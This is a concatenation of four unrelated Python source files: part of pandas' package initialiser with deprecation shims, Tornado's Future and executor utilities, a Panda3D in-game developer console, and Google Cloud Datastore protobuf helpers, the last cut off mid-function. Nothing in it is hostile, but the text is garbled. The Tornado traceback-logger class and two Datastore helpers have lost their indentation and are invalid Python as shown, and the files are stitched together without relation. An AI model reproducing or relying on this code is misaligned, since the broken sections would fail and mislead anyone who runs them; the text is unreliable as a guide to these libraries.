            try:
                return getattr(self.np, item)
            except AttributeError as err:
                raise AttributeError(f"module numpy has no attribute {item}") from err

    np = __numpy()

    class __Datetime(type):
        # Metaclass so that attribute access and isinstance() checks on the
        # ``pandas.datetime`` *class* delegate to datetime.datetime.
        from datetime import datetime as dt

        datetime = dt

        def __getattr__(cls, item):
            cls.emit_warning()
            try:
                return getattr(cls.datetime, item)
            except AttributeError as err:
                raise AttributeError(
                    f"module datetime has no attribute {item}"
                ) from err

        def __instancecheck__(cls, other):
            # isinstance(x, pandas.datetime) behaves like datetime.datetime.
            return isinstance(other, cls.datetime)

    class __DatetimeSub(metaclass=__Datetime):
        def emit_warning(dummy=0):
            import warnings

            warnings.warn(
                "The pandas.datetime class is deprecated "
                "and will be removed from pandas in a future version. "
                "Import from datetime instead.",
                FutureWarning,
                stacklevel=3,
            )

        def __new__(cls, *args, **kwargs):
            # Constructing pandas.datetime(...) warns, then builds a real
            # datetime.datetime instance.
            cls.emit_warning()
            from datetime import datetime as dt

            return dt(*args, **kwargs)

    datetime = __DatetimeSub

    class __SparseArray(type):
        # Same metaclass trick for the deprecated top-level SparseArray alias.
        from pandas.core.arrays.sparse import SparseArray as sa

        SparseArray = sa

        def __instancecheck__(cls, other):
            return isinstance(other, cls.SparseArray)

    class __SparseArraySub(metaclass=__SparseArray):
        def emit_warning(dummy=0):
            import warnings

            warnings.warn(
                "The pandas.SparseArray class is deprecated "
                "and will be removed from pandas in a future version. "
                "Use pandas.arrays.SparseArray instead.",
                FutureWarning,
                stacklevel=3,
            )

        def __new__(cls, *args, **kwargs):
            cls.emit_warning()
            from pandas.core.arrays.sparse import SparseArray as sa

            return sa(*args, **kwargs)

    SparseArray = __SparseArraySub
# module level doc-string
__doc__ = """
pandas - a powerful data analysis and manipulation library for Python
=====================================================================
**pandas** is a Python package providing fast, flexible, and expressive data
structures designed to make working with "relational" or "labeled" data both
easy and intuitive. It aims to be the fundamental high-level building block for
doing practical, **real world** data analysis in Python. Additionally, it has
the broader goal of becoming **the most powerful and flexible open source data
analysis / manipulation tool available in any language**. It is already well on
its way toward this goal.
Main Features
-------------
Here are just a few of the things that pandas does well:
- Easy handling of missing data in floating point as well as non-floating
point data.
- Size mutability: columns can be inserted and deleted from DataFrame and
higher dimensional objects
- Automatic and explicit data alignment: objects can be explicitly aligned
to a set of labels, or the user can simply ignore the labels and let
`Series`, `DataFrame`, etc. automatically align the data for you in
computations.
- Powerful, flexible group by functionality to perform split-apply-combine
operations on data sets, for both aggregating and transforming data.
- Make it easy to convert ragged, differently-indexed data in other Python
and NumPy data structures into DataFrame objects.
- Intelligent label-based slicing, fancy indexing, and subsetting of large
data sets.
- Intuitive merging and joining data sets.
- Flexible reshaping and pivoting of data sets.
- Hierarchical labeling of axes (possible to have multiple labels per tick).
- Robust IO tools for loading data from flat files (CSV and delimited),
Excel files, databases, and saving/loading data from the ultrafast HDF5
format.
- Time series-specific functionality: date range generation and frequency
conversion, moving window statistics, date shifting and lagging.
"""
| |
#!/usr/bin/env python
#
# Copyright 2012 Facebook
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Utilities for working with threads and ``Futures``.
``Futures`` are a pattern for concurrent programming introduced in
Python 3.2 in the `concurrent.futures` package (this package has also
been backported to older versions of Python and can be installed with
``pip install futures``). Tornado will use `concurrent.futures.Future` if
it is available; otherwise it will use a compatible class defined in this
module.
"""
from __future__ import absolute_import, division, print_function, with_statement
import functools
import platform
import textwrap
import traceback
import sys
from tornado.log import app_log
from tornado.stack_context import ExceptionStackContext, wrap
from tornado.util import raise_exc_info, ArgReplacer
try:
    from concurrent import futures
except ImportError:
    # concurrent.futures is unavailable (Python 2 without the "futures"
    # backport installed); the module falls back to the compatible Future
    # implementation defined below.
    futures = None
# Can the garbage collector handle cycles that include __del__ methods?
# This is true in cpython beginning with version 3.4 (PEP 442).
# When False, Future delegates its destruction-time logging to the
# cycle-safe _TracebackLogger helper instead of defining __del__ itself.
_GC_CYCLE_FINALIZERS = (platform.python_implementation() == 'CPython' and
                        sys.version_info >= (3, 4))
class ReturnValueIgnoredError(Exception):
    """Raised by ``@return_future`` when the wrapped function returns a value.

    Functions decorated with `return_future` must deliver their result via
    the ``callback`` argument; a non-None return value would be silently
    discarded, so it is treated as an error instead.
    """
    pass
# This class and associated code in the future object is derived
# from the Trollius project, a backport of asyncio to Python 2.x - 3.x
class _TracebackLogger(object):
"""Helper to log a traceback upon destruction if not cleared.
This solves a nasty problem with Futures and Tasks that have an
exception set: if nobody asks for the exception, the exception is
never logged. This violates the Zen of Python: 'Errors should
never pass silently. Unless explicitly silenced.'
However, we don't want to log the exception as soon as
set_exception() is called: if the calling code is written
properly, it will get the exception and handle it properly. But
we *do* want to log it if result() or exception() was never called
-- otherwise developers waste a lot of time wondering why their
buggy code fails silently.
An earlier attempt added a __del__() method to the Future class
itself, but this backfired because the presence of __del__()
prevents garbage collection from breaking cycles. A way out of
this catch-22 is to avoid having a __del__() method on the Future
class itself, but instead to have a reference to a helper object
with a __del__() method that logs the traceback, where we ensure
that the helper object doesn't participate in cycles, and only the
Future has a reference to it.
The helper object is added when set_exception() is called. When
the Future is collected, and the helper is present, the helper
object is also collected, and its __del__() method will log the
traceback. When the Future's result() or exception() method is
called (and a helper object is present), it removes the the helper
object, after calling its clear() method to prevent it from
logging.
One downside is that we do a fair amount of work to extract the
traceback from the exception, even when it is never logged. It
would seem cheaper to just store the exception object, but that
references the traceback, which references stack frames, which may
reference the Future, which references the _TracebackLogger, and
then the _TracebackLogger would be included in a cycle, which is
what we're trying to avoid! As an optimization, we don't
immediately format the exception; we only do the work when
activate() is called, which call is delayed until after all the
Future's callbacks have run. Since usually a Future has at least
one callback (typically set by 'yield From') and usually that
callback extracts the callback, thereby removing the need to
format the exception.
PS. I don't claim credit for this solution. I first heard of it
in a discussion about closing files when they are collected.
"""
__slots__ = ('exc_info', 'formatted_tb')
def __init__(self, exc_info):
self.exc_info = exc_info
self.formatted_tb = None
def activate(self):
exc_info = self.exc_info
if exc_info is not None:
self.exc_info = None
self.formatted_tb = traceback.format_exception(*exc_info)
def clear(self):
self.exc_info = None
self.formatted_tb = None
def __del__(self):
if self.formatted_tb:
app_log.error('Future exception was never retrieved: %s',
''.join(self.formatted_tb).rstrip())
class Future(object):
    """Placeholder for an asynchronous result.

    A ``Future`` encapsulates the result of an asynchronous
    operation.  In synchronous applications ``Futures`` are used
    to wait for the result from a thread or process pool; in
    Tornado they are normally used with `.IOLoop.add_future` or by
    yielding them in a `.gen.coroutine`.

    `tornado.concurrent.Future` is similar to
    `concurrent.futures.Future`, but not thread-safe (and therefore
    faster for use with single-threaded event loops).

    In addition to ``exception`` and ``set_exception``, methods ``exc_info``
    and ``set_exc_info`` are supported to capture tracebacks in Python 2.
    The traceback is automatically available in Python 3, but in the
    Python 2 futures backport this information is discarded.
    This functionality was previously available in a separate class
    ``TracebackFuture``, which is now a deprecated alias for this class.

    .. versionchanged:: 4.0
       `tornado.concurrent.Future` is always a thread-unsafe ``Future``
       with support for the ``exc_info`` methods.  Previously it would
       be an alias for the thread-safe `concurrent.futures.Future`
       if that package was available and fall back to the thread-unsafe
       implementation if it was not.

    .. versionchanged:: 4.1
       If a `.Future` contains an error but that error is never observed
       (by calling ``result()``, ``exception()``, or ``exc_info()``),
       a stack trace will be logged when the `.Future` is garbage collected.
       This normally indicates an error in the application, but in cases
       where it results in undesired logging it may be necessary to
       suppress the logging by ensuring that the exception is observed:
       ``f.add_done_callback(lambda f: f.exception())``.
    """
    def __init__(self):
        self._done = False
        self._result = None
        self._exc_info = None

        self._log_traceback = False   # Used for Python >= 3.4
        self._tb_logger = None        # Used for Python <= 3.3

        self._callbacks = []

    # Implement the Python 3.5 Awaitable protocol if possible
    # (we can't use return and yield together until py33).
    # The method is injected via exec() so the file still parses on
    # interpreters that would reject ``return (yield self)``.
    if sys.version_info >= (3, 3):
        exec(textwrap.dedent("""
        def __await__(self):
            return (yield self)
        """))

    def cancel(self):
        """Cancel the operation, if possible.

        Tornado ``Futures`` do not support cancellation, so this method always
        returns False.
        """
        return False

    def cancelled(self):
        """Returns True if the operation has been cancelled.

        Tornado ``Futures`` do not support cancellation, so this method
        always returns False.
        """
        return False

    def running(self):
        """Returns True if this operation is currently running."""
        return not self._done

    def done(self):
        """Returns True if the future has finished running."""
        return self._done

    def _clear_tb_log(self):
        # The exception has been observed: disable both logging paths
        # (the PEP 442 __del__ flag and the pre-3.4 helper object).
        self._log_traceback = False
        if self._tb_logger is not None:
            self._tb_logger.clear()
            self._tb_logger = None

    def result(self, timeout=None):
        """If the operation succeeded, return its result.  If it failed,
        re-raise its exception.

        This method takes a ``timeout`` argument for compatibility with
        `concurrent.futures.Future` but it is an error to call it
        before the `Future` is done, so the ``timeout`` is never used.
        """
        self._clear_tb_log()
        # Fast path: a non-None result implies success and done.
        if self._result is not None:
            return self._result
        if self._exc_info is not None:
            raise_exc_info(self._exc_info)
        self._check_done()
        return self._result

    def exception(self, timeout=None):
        """If the operation raised an exception, return the `Exception`
        object.  Otherwise returns None.

        This method takes a ``timeout`` argument for compatibility with
        `concurrent.futures.Future` but it is an error to call it
        before the `Future` is done, so the ``timeout`` is never used.
        """
        self._clear_tb_log()
        if self._exc_info is not None:
            return self._exc_info[1]
        else:
            self._check_done()
            return None

    def add_done_callback(self, fn):
        """Attaches the given callback to the `Future`.

        It will be invoked with the `Future` as its argument when the Future
        has finished running and its result is available.  In Tornado
        consider using `.IOLoop.add_future` instead of calling
        `add_done_callback` directly.
        """
        if self._done:
            # Already resolved: run the callback immediately (synchronously).
            fn(self)
        else:
            self._callbacks.append(fn)

    def set_result(self, result):
        """Sets the result of a ``Future``.

        It is undefined to call any of the ``set`` methods more than once
        on the same object.
        """
        self._result = result
        self._set_done()

    def set_exception(self, exception):
        """Sets the exception of a ``Future.``"""
        self.set_exc_info(
            (exception.__class__,
             exception,
             getattr(exception, '__traceback__', None)))

    def exc_info(self):
        """Returns a tuple in the same format as `sys.exc_info` or None.

        .. versionadded:: 4.0
        """
        self._clear_tb_log()
        return self._exc_info

    def set_exc_info(self, exc_info):
        """Sets the exception information of a ``Future.``

        Preserves tracebacks on Python 2.

        .. versionadded:: 4.0
        """
        self._exc_info = exc_info
        self._log_traceback = True
        if not _GC_CYCLE_FINALIZERS:
            # Pre-PEP 442: delegate destruction-time logging to the
            # cycle-safe helper instead of defining __del__ here.
            self._tb_logger = _TracebackLogger(exc_info)

        try:
            self._set_done()
        finally:
            # Activate the logger after all callbacks have had a
            # chance to call result() or exception().
            if self._log_traceback and self._tb_logger is not None:
                self._tb_logger.activate()
        # NOTE(review): this reassignment repeats the first statement of the
        # method and appears to be redundant; kept as-is for compatibility.
        self._exc_info = exc_info

    def _check_done(self):
        if not self._done:
            raise Exception("DummyFuture does not support blocking for results")

    def _set_done(self):
        self._done = True
        for cb in self._callbacks:
            try:
                cb(self)
            except Exception:
                # A failing callback must not prevent the others from running.
                app_log.exception('Exception in callback %r for %r',
                                  cb, self)
        # Release callback references once fired.
        self._callbacks = None

    # On Python 3.3 or older, objects with a destructor part of a reference
    # cycle are never destroyed. It's no longer the case on Python 3.4 thanks to
    # the PEP 442.
    if _GC_CYCLE_FINALIZERS:
        def __del__(self):
            if not self._log_traceback:
                # set_exception() was not called, or result() or exception()
                # has consumed the exception
                return

            tb = traceback.format_exception(*self._exc_info)

            app_log.error('Future %r exception was never retrieved: %s',
                          self, ''.join(tb).rstrip())
# Deprecated alias retained for backwards compatibility (see Future docstring).
TracebackFuture = Future

if futures is None:
    FUTURES = Future
else:
    # isinstance()-compatible: matches either Future implementation.
    FUTURES = (futures.Future, Future)
def is_future(x):
    """Return True if ``x`` is a Tornado or `concurrent.futures` ``Future``."""
    return isinstance(x, FUTURES)
class DummyExecutor(object):
    """Executor-like object that runs submitted callables synchronously.

    ``submit`` invokes ``fn`` immediately on the calling thread and returns
    an already-resolved `TracebackFuture` holding its result (or the
    exception info if it raised).
    """

    def submit(self, fn, *args, **kwargs):
        resolved = TracebackFuture()
        try:
            value = fn(*args, **kwargs)
        except Exception:
            resolved.set_exc_info(sys.exc_info())
        else:
            resolved.set_result(value)
        return resolved

    def shutdown(self, wait=True):
        """No-op; there is nothing to shut down for synchronous execution."""
        pass


dummy_executor = DummyExecutor()
def run_on_executor(*args, **kwargs):
    """Decorator to run a synchronous method asynchronously on an executor.

    The decorated method may be called with a ``callback`` keyword
    argument and returns a future.

    The `.IOLoop` and executor to be used are determined by the ``io_loop``
    and ``executor`` attributes of ``self``. To use different attributes,
    pass keyword arguments to the decorator::

        @run_on_executor(executor='_thread_pool')
        def foo(self):
            pass

    .. versionchanged:: 4.2
       Added keyword arguments to use alternative attributes.
    """
    def run_on_executor_decorator(fn):
        # Names of the attributes on ``self`` holding the executor and the
        # IOLoop; overridable via decorator keyword arguments.
        executor = kwargs.get("executor", "executor")
        io_loop = kwargs.get("io_loop", "io_loop")

        @functools.wraps(fn)
        def wrapper(self, *args, **kwargs):
            callback = kwargs.pop("callback", None)
            future = getattr(self, executor).submit(fn, self, *args, **kwargs)
            if callback:
                # Deliver the unwrapped result to the callback on the IOLoop.
                getattr(self, io_loop).add_future(
                    future, lambda future: callback(future.result()))
            return future
        return wrapper

    # Support both bare ``@run_on_executor`` (one positional arg: the
    # function) and parameterized ``@run_on_executor(...)`` usage.
    if args and kwargs:
        raise ValueError("cannot combine positional and keyword args")
    if len(args) == 1:
        return run_on_executor_decorator(args[0])
    elif len(args) != 0:
        # Bug fix: the count was previously passed as a second exception
        # argument ("...got %d", n), leaving the literal "%d" in the message.
        raise ValueError("expected 1 argument, got %d" % len(args))
    return run_on_executor_decorator
# Sentinel: distinguishes "callback invoked with no value" from a real None.
_NO_RESULT = object()


def return_future(f):
    """Decorator to make a function that returns via callback return a
    `Future`.

    The wrapped function should take a ``callback`` keyword argument
    and invoke it with one argument when it has finished.  To signal failure,
    the function can simply raise an exception (which will be
    captured by the `.StackContext` and passed along to the ``Future``).

    From the caller's perspective, the callback argument is optional.
    If one is given, it will be invoked when the function is complete
    with `Future.result()` as an argument.  If the function fails, the
    callback will not be run and an exception will be raised into the
    surrounding `.StackContext`.

    If no callback is given, the caller should use the ``Future`` to
    wait for the function to complete (perhaps by yielding it in a
    `.gen.engine` function, or passing it to `.IOLoop.add_future`).

    Usage:

    .. testcode::

        @return_future
        def future_func(arg1, arg2, callback):
            # Do stuff (possibly asynchronous)
            callback(result)

        @gen.engine
        def caller(callback):
            yield future_func(arg1, arg2)
            callback()

    ..

    Note that ``@return_future`` and ``@gen.engine`` can be applied to the
    same function, provided ``@return_future`` appears first.  However,
    consider using ``@gen.coroutine`` instead of this combination.
    """
    replacer = ArgReplacer(f, 'callback')

    @functools.wraps(f)
    def wrapper(*args, **kwargs):
        future = TracebackFuture()
        # Swap in (or inject) a callback that resolves the future, keeping a
        # reference to the caller-supplied callback, if any.
        callback, args, kwargs = replacer.replace(
            lambda value=_NO_RESULT: future.set_result(value),
            args, kwargs)

        def handle_error(typ, value, tb):
            # Exceptions escaping into the stack context resolve the future.
            future.set_exc_info((typ, value, tb))
            return True
        exc_info = None
        with ExceptionStackContext(handle_error):
            try:
                result = f(*args, **kwargs)
                if result is not None:
                    raise ReturnValueIgnoredError(
                        "@return_future should not be used with functions "
                        "that return values")
            except:
                exc_info = sys.exc_info()
                raise
        if exc_info is not None:
            # If the initial synchronous part of f() raised an exception,
            # go ahead and raise it to the caller directly without waiting
            # for them to inspect the Future.
            future.result()

        # If the caller passed in a callback, schedule it to be called
        # when the future resolves.  It is important that this happens
        # just before we return the future, or else we risk confusing
        # stack contexts with multiple exceptions (one here with the
        # immediate exception, and again when the future resolves and
        # the callback triggers its exception by calling future.result()).
        if callback is not None:
            def run_callback(future):
                result = future.result()
                if result is _NO_RESULT:
                    # Callback was invoked with no arguments; mirror that.
                    callback()
                else:
                    callback(future.result())
            future.add_done_callback(wrap(run_callback))
        return future
    return wrapper
def chain_future(a, b):
    """Chain two futures together so that when one completes, so does the other.

    The result (success or failure) of ``a`` will be copied to ``b``, unless
    ``b`` has already been completed or cancelled by the time ``a`` finishes.
    """
    def copy(future):
        assert future is a
        # ``b`` may have been resolved elsewhere in the meantime.
        if b.done():
            return
        # Prefer the traceback-preserving channel when both futures support it.
        both_traceback = (isinstance(a, TracebackFuture) and
                          isinstance(b, TracebackFuture))
        if both_traceback and a.exc_info() is not None:
            b.set_exc_info(a.exc_info())
        elif a.exception() is not None:
            b.set_exception(a.exception())
        else:
            b.set_result(a.result())
    a.add_done_callback(copy)
| |
# -*- coding: utf-8 -*-
# Copyright Reinier de Blois
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from panda3d.core import TextNode, TextProperties, TextPropertiesManager
from direct.showbase.DirectObject import DirectObject
from direct.gui.DirectGui import DirectFrame, DirectEntry
from direct.gui.OnscreenText import OnscreenText
from panda3d.core import *
import sys
import traceback
import __main__
from code import InteractiveInterpreter
import panda3d
# (x, y) offset applied to the console frame's text position (see
# DeveloperConsole.__init__); presumably in aspect2d units -- TODO confirm.
TEXT_MARGIN = (0.03, -0.06)
class PseudoFile:
    """Minimal file-like object that forwards writes to a callback.

    Used to redirect ``sys.stdout``/``sys.stderr`` into the developer
    console: each ``write()`` call goes straight to the callable supplied
    at construction time.
    """

    def __init__(self, write):
        # The callback becomes this instance's ``write`` method.
        self.write = write

    def readline(self):
        """Reading is unsupported; returns None."""
        pass

    def writelines(self, l):
        # Bug fix: previously ``map(self.append, l)`` -- ``append`` does not
        # exist on this class, and on Python 3 the lazy ``map`` never even
        # executed. Forward each item to the write callback instead.
        for line in l:
            self.write(line)

    def flush(self):
        """No-op; writes are forwarded immediately."""
        pass

    def isatty(self):
        # Report "is a terminal" so interactive consumers behave.
        return 1
class DeveloperConsole(InteractiveInterpreter, DirectObject):
    """The name says it all."""
    # NOTE(review): depends on Panda3D/ShowBase builtins (``base``,
    # ``loader``) and on ``manager`` / ``events`` objects that are not
    # defined in this module -- confirm they are injected by the host
    # application before this class is instantiated.

    def __init__(self, xml):
        # Redirect stdout/stderr into the on-screen console; PseudoFile
        # forwards every write to writeOut/writeErr below.
        sys.stdout = PseudoFile(self.writeOut)
        sys.stderr = PseudoFile(self.writeErr)
        # "err" text property renders error output in red (used by writeErr).
        tpErr = TextProperties()
        tpErr.setTextColor(1, 0.5, 0.5, 1)
        TextPropertiesManager.getGlobalPtr().setProperties("err", tpErr)
        font = loader.loadFont("cmss12")
        self.frame = DirectFrame(parent=base.a2dTopCenter, text_align=TextNode.ALeft, text_pos=(-base.getAspectRatio() + TEXT_MARGIN[0], TEXT_MARGIN[1]), text_scale=0.05, text_fg=(1, 1, 1, 1), frameSize=(-2.0, 2.0, -0.5, 0.0), frameColor=(0, 0, 0, 0.5), text='', text_font=font)
        self.entry = DirectEntry(parent=base.a2dTopLeft, command=self.command, scale=0.05, width=1000.0, pos=(-0.02, 0, -0.48), relief=None, text_pos=(1.5, 0, 0), text_fg=(1, 1, 0.5, 1), rolloverSound=None, clickSound=None, text_font=font)
        self.otext = OnscreenText(parent=self.entry, scale=1, align=TextNode.ALeft, pos=(1, 0, 0), fg=(1, 1, 0.5, 1), text=':', font=font)
        self.lines = [''] * 9
        self.commands = []  # All previously sent commands
        self.cscroll = None  # Index of currently navigated command, None if current
        # NOTE(review): this attribute shadows the ``command`` *method*; the
        # bound method was already handed to DirectEntry above, so the entry
        # callback keeps working, but later attribute access gets the string.
        self.command = ''  # Currently entered command
        self.block = ''  # Temporarily stores a block of commands
        self.hide()
        self.initialized = False
        self.toggleKeys = manager.controls.registerKeyAll("Toggle Console", "`", self.toggle, self)

    def reload(self, xml):
        # No per-reload state to refresh.
        pass

    def prevCommand(self):
        """Step backwards through the command history (arrow-up)."""
        if self.hidden:
            return
        if len(self.commands) == 0:
            return
        if self.cscroll == None:
            # Entering history navigation: remember the in-progress command.
            self.cscroll = len(self.commands)
            self.command = self.entry.get()
        elif self.cscroll <= 0:
            # Already at the oldest entry.
            return
        else:
            # Preserve any edits made to the currently displayed entry.
            self.commands[self.cscroll] = self.entry.get()
        self.cscroll -= 1
        self.entry.set(self.commands[self.cscroll])
        self.entry.setCursorPosition(len(self.commands[self.cscroll]))

    def nextCommand(self):
        """Step forwards through the command history (arrow-down)."""
        if self.hidden:
            return
        if len(self.commands) == 0:
            return
        if self.cscroll == None:
            return
        self.commands[self.cscroll] = self.entry.get()
        self.cscroll += 1
        if self.cscroll >= len(self.commands):
            # Walked past the newest entry: restore the in-progress command.
            self.cscroll = None
            self.entry.set(self.command)
            self.entry.setCursorPosition(len(self.command))
        else:
            self.entry.set(self.commands[self.cscroll])
            self.entry.setCursorPosition(len(self.commands[self.cscroll]))

    def writeOut(self, line, copy=True):
        """Append ``line`` to the console display; optionally echo to the
        real stdout."""
        if copy:
            sys.__stdout__.write(line)
        lines = line.split('\n')
        # First fragment continues the current line; the rest start new ones.
        firstline = lines.pop(0)
        self.lines[-1] += firstline
        self.lines += lines
        # Only the last 9 lines fit in the frame.
        self.frame['text'] = '\n'.join(self.lines[-9:])

    def writeErr(self, line, copy=True):
        """Like writeOut, but wraps the text in the red "err" text property."""
        if copy:
            sys.__stderr__.write(line)
        line = '\1err\1%s\2' % line
        lines = line.split('\n')
        firstline = lines.pop(0)
        self.lines[-1] += firstline
        self.lines += lines
        self.frame['text'] = '\n'.join(self.lines[-9:])

    def command(self, text):
        """Entry callback: echo, record and execute the submitted command."""
        if not self.hidden:
            self.cscroll = None
            self.command = ''
            self.entry.set('')
            self.entry['focus'] = True
            self.writeOut(self.otext['text'] + ' ' + text + '\n', False)
            # Record non-empty, non-duplicate commands in the history.
            if text != '' and (len(self.commands) == 0 or self.commands[-1] != text):
                self.commands.append(text)
            # Insert plugins into the local namespace
            locals = __main__.__dict__
            for plugin in manager.getNamed().keys():
                locals[plugin] = manager.getNamed()[plugin]
            locals['panda3d'] = panda3d
            #register custom commands
            locals['reload'] = manager.reload
            locals['load'] = manager.transition
            locals['wireframe'] = base.toggleWireframe
            locals['trigger'] = events.triggerEvent
            # Run it and print the output.
            if not self.initialized:
                # Lazily initialize the interpreter with the populated locals.
                InteractiveInterpreter.__init__(self, locals=locals)
                self.initialized = True
            try:
                # runsource() returning True means "more input needed":
                # accumulate into self.block and show a continuation prompt.
                if self.runsource(self.block + '\n' + text) and text != '':
                    self.otext['text'] = '.'
                    self.block += '\n' + text
                else:
                    self.otext['text'] = ':'
                    self.block = ''
            except Exception:  # Not just "except", it will also catch SystemExit
                # Whoops! Print out a traceback.
                self.writeErr(traceback.format_exc())

    def toggle(self):
        """Show/hide the console, stripping the toggle key from the entry."""
        #remove toggle key from entry
        if self.entry['focus']:
            for gtype in self.toggleKeys.keys():
                key = self.toggleKeys[gtype]
                entryLen = len(self.entry.get(True))
                # If the entry text ends with the toggle key, cut it off.
                if self.entry.get(True)[entryLen - len(key):entryLen] == key:
                    self.entry.enterText(self.entry.get(True)[:entryLen - len(key)])
        if self.hidden:
            self.show()
        else:
            self.hide()

    def start(self):
        return
        #self.toggle()

    def stop(self):
        return
        #self.toggle()

    def show(self):
        # Bind history navigation only while visible.
        self.accept('arrow_up', self.prevCommand)
        self.accept('arrow_up-repeat', self.prevCommand)
        self.accept('arrow_down', self.nextCommand)
        self.accept('arrow_down-repeat', self.nextCommand)
        self.hidden = False
        self.entry['focus'] = True
        self.frame.show()
        self.entry.show()
        self.otext.show()

    def hide(self):
        self.ignoreAll()
        self.hidden = True
        self.entry['focus'] = False
        self.frame.hide()
        self.entry.hide()
        self.otext.hide()

    def destroy(self):
        # Restore the real streams before tearing down the GUI.
        sys.stdout = sys.__stdout__
        sys.stderr = sys.__stderr__
        self.ignoreAll()
        self.frame.destroy()
        self.entry.destroy()
        self.otext.destroy()
| |
# Copyright 2014 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Helper functions for dealing with Cloud Datastore's Protobuf API.
The non-private functions are part of the API.
"""
import datetime
import itertools
from google.protobuf import struct_pb2
from google.type import latlng_pb2
import six
from google.cloud._helpers import _datetime_to_pb_timestamp
from google.cloud._helpers import _pb_timestamp_to_datetime
from google.cloud.datastore_v1.proto import datastore_pb2
from google.cloud.datastore_v1.proto import entity_pb2
from google.cloud.datastore.entity import Entity
from google.cloud.datastore.key import Key
def _get_meaning(value_pb, is_list=False):
"""Get the meaning from a protobuf value.
:type value_pb: :class:`.entity_pb2.Value`
:param value_pb: The protobuf value to be checked for an
associated meaning.
:type is_list: bool
:param is_list: Boolean indicating if the ``value_pb`` contains
a list value.
:rtype: int
:returns: The meaning for the ``value_pb`` if one is set, else
:data:`None`. For a list value, if there are disagreeing
means it just returns a list of meanings. If all the
list meanings agree, it just condenses them.
"""
meaning = None
if is_list:
# An empty list will have no values, hence no shared meaning
# set among them.
if len(value_pb.array_value.values) == 0:
return None
# We check among all the meanings, some of which may be None,
# the rest which may be enum/int values.
all_meanings = [_get_meaning(sub_value_pb)
for sub_value_pb in value_pb.array_value.values]
unique_meanings = set(all_meanings)
if len(unique_meanings) == 1:
# If there is a unique meaning, we preserve it.
meaning = unique_meanings.pop()
else: # We know len(value_pb.array_value.values) > 0.
# If the meaning is not unique, just return all of them.
meaning = all_meanings
elif value_pb.meaning: # Simple field (int32).
meaning = value_pb.meaning
return meaning
def _new_value_pb(entity_pb, name):
"""Add (by name) a new ``Value`` protobuf to an entity protobuf.
:type entity_pb: :class:`.entity_pb2.Entity`
:param entity_pb: An entity protobuf to add a new property to.
:type name: str
:param name: The name of the new property.
:rtype: :class:`.entity_pb2.Value`
:returns: The new ``Value`` protobuf that was added to the entity.
"""
return entity_pb.properties.get_or_create(name)
def _property_tuples(entity_pb):
    """Iterator of name, ``Value`` tuples from entity properties.

    :type entity_pb: :class:`.entity_pb2.Entity`
    :param entity_pb: An entity protobuf to add a new property to.

    :rtype: :class:`generator`
    :returns: An iterator that yields tuples of a name and ``Value``
              corresponding to properties on the entity.
    """
    # six.iteritems keeps this lazy on Python 2 (plain items() would copy).
    return six.iteritems(entity_pb.properties)
def entity_from_protobuf(pb):
    """Factory method for creating an entity based on a protobuf.

    The protobuf should be one returned from the Cloud Datastore
    Protobuf API.

    :type pb: :class:`.entity_pb2.Entity`
    :param pb: The Protobuf representing the entity.

    :rtype: :class:`google.cloud.datastore.entity.Entity`
    :returns: The entity derived from the protobuf.
    """
    key = None
    if pb.HasField('key'):  # Message field (Key)
        key = key_from_protobuf(pb.key)

    entity_props = {}
    entity_meanings = {}
    exclude_from_indexes = []

    for prop_name, value_pb in _property_tuples(pb):
        value = _get_value_from_value_pb(value_pb)
        entity_props[prop_name] = value

        # Check if the property has an associated meaning.
        is_list = isinstance(value, list)
        meaning = _get_meaning(value_pb, is_list=is_list)
        if meaning is not None:
            # Keep the original value alongside the meaning so it can be
            # restored on write only if the value is unchanged.
            entity_meanings[prop_name] = (meaning, value)

        # Check if ``value_pb`` was excluded from index. Lists need to be
        # special-cased and we require all ``exclude_from_indexes`` values
        # in a list agree.
        if is_list and len(value) > 0:
            # NOTE: the generator's ``value_pb`` deliberately shadows the
            # outer loop variable; each sub-value carries its own flag.
            exclude_values = set(value_pb.exclude_from_indexes
                                 for value_pb in value_pb.array_value.values)
            if len(exclude_values) != 1:
                raise ValueError('For an array_value, subvalues must either '
                                 'all be indexed or all excluded from '
                                 'indexes.')

            if exclude_values.pop():
                exclude_from_indexes.append(prop_name)
        else:
            if value_pb.exclude_from_indexes:
                exclude_from_indexes.append(prop_name)

    entity = Entity(key=key, exclude_from_indexes=exclude_from_indexes)
    entity.update(entity_props)
    entity._meanings.update(entity_meanings)
    return entity
def _set_pb_meaning_from_entity(entity, name, value, value_pb,
                                is_list=False):
    """Add meaning information (from an entity) to a protobuf.

    :type entity: :class:`google.cloud.datastore.entity.Entity`
    :param entity: The entity to be turned into a protobuf.

    :type name: str
    :param name: The name of the property.

    :type value: object
    :param value: The current value stored as property ``name``.

    :type value_pb: :class:`.entity_pb2.Value`
    :param value_pb: The protobuf value to add meaning / meanings to.

    :type is_list: bool
    :param is_list: (Optional) Boolean indicating if the ``value`` is
                    a list value.
    """
    if name not in entity._meanings:
        return

    meaning, orig_value = entity._meanings[name]
    # Only add the meaning back to the protobuf if the value is
    # unchanged from when it was originally read from the API.
    # (Identity check: mutation or replacement both disqualify.)
    if orig_value is not value:
        return

    # For lists, we set meaning on each sub-element.
    if is_list:
        if not isinstance(meaning, list):
            # A single shared meaning: repeat it for every sub-value.
            meaning = itertools.repeat(meaning)
        val_iter = six.moves.zip(value_pb.array_value.values,
                                 meaning)
        for sub_value_pb, sub_meaning in val_iter:
            if sub_meaning is not None:
                sub_value_pb.meaning = sub_meaning
    else:
